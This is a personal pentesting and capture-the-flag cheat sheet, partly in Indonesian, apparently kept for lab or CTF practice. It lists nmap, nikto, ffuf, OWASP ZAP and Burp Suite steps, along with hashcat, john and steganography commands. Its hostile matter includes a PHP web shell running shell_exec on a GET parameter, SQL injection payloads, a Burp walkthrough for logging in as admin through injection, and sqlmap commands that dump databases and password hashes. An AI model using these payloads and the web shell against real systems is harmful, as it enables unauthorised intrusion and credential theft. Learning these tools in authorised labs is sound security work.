nmap

● nmap -sV -sC -oA <ipadress> *cara dapat ip adress bisa ping ke url target
(quickscan)
● nmap -p- -sV -sC -oA <ipadress> (scan all port)

nikto
● nikto -h <URL_target>

directory brute force

inject cmd vulnerability

echo “<pre>”;
echo shell_exec($_GET[‘cmd’]);
echo “</pre>”;
exit();
get_header();

?>
sql injection
● ‘ or 1=1 -- -
● administrator' –
● 1' UNION SELECT 1,2;- -
● 1’ or “1”=”1

sqlmap
contoh : sqlmap -u <target> --dbs
● -u <target_URL>
● --all
● --dbs (melihat semua database)
● --tables
● --columns
● --dump
● --risk=3 #MAX
● --level=5 #MAX
● sqlmap -u <target_URL> -D <database_name> --tables (memanggil tabel dari
database)
● sqlmap -u <target_URL> -D <database_name> -T <table_name> --columns
(memanggil kolom dari tabel database)
● sqlmap -u <target_URL> -D <database_name> -T <table_name> --dump (langsung
bisa crack password jika ada)
 ● –C <isi dari column; ex: username, password> --dump
● sqlmap -u <target_URL> -D <database_name> --dump-all (memanggil semua isi
dari database)
● --hostname #Get hostname
● --current-user #untuk melihat current user yang menjalankan SQL
● --is-dba #Check if current user is Admin
● --users #melihat semua users dari SQL
● --passwords #Get passwords of users in DBmemberikan password yang di hash dari
SQL instance
● --privileges #Get privileges
Dump Password :
● sqlmap -u <target_URL> -C password --dump
● sqlmap -D <database_name> -T <table_name> --dump

OWASP ZAP
download OWASP ZAP > [Link]
- bisa pakai 2 cara > automated dan manual
- automated > copas link > lihat spider > lihat file alert (informasi) > cari attacker >
ganti url dengan ‘attack’
- manual > enable HUD > launch > add scope > login > cari targetnya > hapus out
scope > cari http request (search) > attack (active scan) filenya > alerts > cari
attacker > salin url dgn attack > cari dengan ‘attacker’

BURPSUITE
- bikin profil > proxy > intercept on > enter pass > proxy (klik kanan) > send to repeater
> repeater > inspector > blok user id > closing bracket (hapus & dan tambah [‘)]) >
tambah (or admin=’t’) > enter > tambah (-- ‘ “) > delete user (sisa password) > send >
login dengan admin@blabla dan pass kita

FFUF
install:
1. sudo add-apt-repository -y ppa:longsleep/golang-backports
2. sudo apt update
3. sudo apt install -y golang-go
4. cd ~
5. go get [Link]/ffuf/ffuf
6. sudo ln -s ~/go/bin/ffuf /usr/sbin/ffuf
7. cd ~
8. git clone [Link]
9. cd ffuf
10. go get
11. go build
12. sudo ln -s ~/go/bin/ffuf /usr/sbin/ffuf
practice > [Link]
- ffuf -w ~/wordlists/[Link] -u [Link] (This should of
discovered the files class and [Link])
 - ffuf -w ~/wordlists/[Link] -recursion -u [Link] (This
scan should uncover the directory /admin and then /admin/users and finally the file
/admin/users/96)
- ffuf -w ~/wordlists/[Link] -e .log -u [Link] (The above
scan should of found the file /logs/[Link])
- ffuf -w ~/wordlists/[Link] -u [Link] -ms <status> -fs
<size> (This should cut the results down to just one file secret)
- ffuf -w ~/wordlists/[Link] -u [Link] -ms <status> -fw
<words> (This should cut the results down to just one file secret)
- ffuf -w ~/wordlists/[Link] -u [Link] -ms <status> -ac (This
should cut the results down to just one file secret)
- ffuf -w ~/wordlists/[Link] -u [Link] -ms
<status> (The above command should of returned the missing parameter of debug)
- ffuf -w ~/wordlists/[Link] -t 5 -p 0.1 -u [Link] -mc <status>
[the -p switch causes the application to pause 0.1 seconds per request and the -t
switch creates 5 versions of ffuf which means a maximum of 50 requests per second]
(Now you shouldn't get any more 429 errors and you should find the oracle file)
- seq 1 1000 | ffuf -w - -u [Link] (The above command
should discover a valid result of 657)
- [You'll need to save it in the /usr/local/bin with execute permissions so it's available from
any directory.]
#!/bin/bash

while read i
do
if [ "$1" == "md5" ]; then
echo -n $i | md5sum | awk '{ print $1 }'
elif [ "$1" == "b64" ]; then
echo -n $i | base64
else
echo $i
fi
done
- seq 1 1000 | hashit b64 | ffuf -w - -u [Link] (The above
command should discover a valid result of ODg4Cg== which is integer 888)
- seq 1 1000 | hashit md5 | ffuf -w - -u [Link] (The above
command should discover a valid result of 4daa3db355ef2b0e64b472968cb70f0d which
is integer 934)

password cracking
● hashcat
○ hashcat -m <hash-type> -a 0 /home/deetz/Downloads/<[Link]>
/usr/share/wordlists/[Link]
○ --show (menampilkan output)
○ --force (brute force mode)
○ -a 1 (combinator attack)
● johntheripper
○ pdf2john > ….txt
 ○ john ….txt

CASE :
Cari flag dari file tanpa ekstensi
● strings <nama file> | grep -i flag
Sebutkan Hash SHA256 dari file tersebut!
● menggunakan perintah “sha256sum” diikuti dengan nama file tersebut.
metadata
● exiftool <nama file> (analisis metadata)
● steghide extract -sf <nama file> (cari pesan tersembunyi)

Images :
● exiftool <filename>
● zsteg <filename>
● steghide <filename>
● pngcheck -v <filename>
● stegsolve (GUI)

files zip :
● zipdetails <filename>
● fcrackzip -u -D -p '/usr/share/wordlists/[Link]' <filename>
● zip2john <filename> <outfile>
● john <outfile>